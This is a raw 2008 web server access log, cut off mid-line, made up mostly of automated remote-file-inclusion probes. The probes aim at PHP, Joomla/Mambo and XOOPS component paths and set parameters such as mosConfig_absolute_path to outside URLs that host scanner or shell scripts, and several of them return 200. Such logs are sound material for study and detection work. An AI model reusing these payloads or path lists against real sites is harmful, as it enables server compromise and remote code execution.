200.105.208.186 - - [21/Aug/2008:11:45:48 -0700] "GET /logs/access_080525.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:45:49 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.160 - - [21/Aug/2008:11:45:49 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://russianinterpreter.ru/administrator/templates/mambo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.123 - - [21/Aug/2008:11:45:54 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:46:03 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.110.50.122 - - [21/Aug/2008:11:46:07 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.208.43.121 - - [21/Aug/2008:11:46:14 -0700] "GET /logs/access_080805.log%20//purchase.php?jamroom[jm_dir]=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:46:20 -0700] "GET /logs/access_080401.log//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:46:27 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:46:28 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:46:32 -0700] "GET /logs/access_080401.log//include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:46:34 -0700] "GET /bikes/ HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:46:37 -0700] "GET /logs/access_080329.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:46:37 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9928 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:46:38 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:11:46:43 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.136.249 - - [21/Aug/2008:11:46:43 -0700] "GET /logs/access_080713.log//admin/frontpage_right.php?loadadminpage=http://www.djaviboss.com/install/idmia.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:46:47 -0700] "GET /logs/access_080227.log//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:46:47 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9899 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:46:48 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 61575 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.96 - - [21/Aug/2008:11:46:49 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [21/Aug/2008:11:46:49 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [21/Aug/2008:11:46:50 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:46:57 -0700] "GET /logs/access_080518.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:46:57 -0700] "GET /logs/access_080219.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:47:05 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:47:14 -0700] "GET /logs/access_080717.log//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.165.202 - - [21/Aug/2008:11:47:17 -0700] "GET /logs/access_080401.log%20//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:17 -0700] "GET /logs/access_080303.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:17 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:18 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:23 -0700] "GET /logs/access_080303.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:23 -0700] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:24 -0700] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:47:31 -0700] "GET /logs/access_080615.log//include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:47:32 -0700] "GET /logs//include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:47:32 -0700] "GET //include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:47:36 -0700] "GET //include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:47:36 -0700] "GET /logs/access_080615.log//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:47:36 -0700] "GET /logs//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:47:38 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:47:40 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:47:41 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:47:48 -0700] "GET /logs/access_080219.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.38.189.90 - - [21/Aug/2008:11:47:49 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.38.189.90 - - [21/Aug/2008:11:47:49 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:50 -0700] "GET /logs/access_080103.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:50 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 9930 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:47:51 -0700] "GET /logs/access_080103.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:51 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:47:52 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 9928 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:47:53 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:54 -0700] "GET /logs/access_080303.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:54 -0700] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:55 -0700] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:47:55 -0700] "GET /logs/access_080229.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:55 -0700] "GET /logs/access_080303.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:56 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:47:56 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:48:02 -0700] "GET /logs/access_080806.log//index/login.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:48:02 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:11:48:02 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://locoputo1234.100webspace.net/bots/ids.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:48:02 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:48:11 -0700] "GET /logs/access_080610.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.31.58.188 - - [21/Aug/2008:11:48:12 -0700] "GET /logs/access_080530.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.141.87.6 - - [21/Aug/2008:11:48:15 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:15 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:48:16 -0700] "GET /logs/access_080123.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:48:16 -0700] "GET /bikes/?N=D HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:48:20 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:48:20 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9950 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.96 - - [21/Aug/2008:11:48:21 -0700] "GET /logs/access_080321.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:48:31 -0700] "GET /logs/access_080401.log//include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:33 -0700] "GET /logs/access_080103.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:48:34 -0700] "GET /logs/access_080401.log//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:34 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 9930 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:35 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 61570 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.193.60 - - [21/Aug/2008:11:48:35 -0700] "GET /logs/access_080401.log//include/main.php?lang=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.193.60 - - [21/Aug/2008:11:48:36 -0700] "GET //include/main.php?lang=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.106.193.60 - - [21/Aug/2008:11:48:36 -0700] "GET /logs//include/main.php?lang=http://www.yaraclube.com.br/images/id44.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:52 -0700] "GET /logs/access_080129.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:52 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:53 -0700] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:53 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.128.25 - - [21/Aug/2008:11:48:53 -0700] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.186 - - [21/Aug/2008:11:48:58 -0700] "GET /bikes/?S=A HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:49:14 -0700] "GET ///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:49:16 -0700] "GET /logs/access_080401.log%20//include/main.php?lang=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:49:31 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:49:31 -0700] "GET /administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.222.18.103 - - [21/Aug/2008:11:49:34 -0700] "GET /logs/access_080401.log%20//include/main.php?lang=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:49:51 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:49:54 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:49:59 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.46.13.32 - - [21/Aug/2008:11:49:59 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.180.215.148 - - [21/Aug/2008:11:50:11 -0700] "GET /logs/access_080806.log//index/login.php?DOCUMENT_ROOT=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [21/Aug/2008:11:50:12 -0700] "GET //index/login.php?DOCUMENT_ROOT=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.215.148 - - [21/Aug/2008:11:50:12 -0700] "GET /logs//index/login.php?DOCUMENT_ROOT=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:50:15 -0700] "GET /index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.41.11.250 - - [21/Aug/2008:11:50:18 -0700] "GET /logs/index2.php?content=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.105.208.186 - - [21/Aug/2008:11:50:19 -0700] "GET /logs/access_080229.log///_theme/breadcrumb.php?rootBase=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:50:20 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [21/Aug/2008:11:50:20 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.myboso.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:50:30 -0700] "GET //?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 9899 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:50:37 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [21/Aug/2008:11:50:37 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:11:50:39 -0700] "GET /logs/access_080616.log/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.214.192.30 - - [21/Aug/2008:11:50:40 -0700] "GET /logs/access_080124.log/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:11:50:40 -0700] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 200 9928 "-" "libwww-perl/5.812" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:11:50:40 -0700] "GET /logs/access_080710.log////?prefix=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.178.147.89 - - [21/Aug/2008:11:50:41 -0700] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.44.72.170 - - [21/Aug/2008:11:50:42 -0700] "GET ////?prefix=http://www.topgas.co.uk/forum/su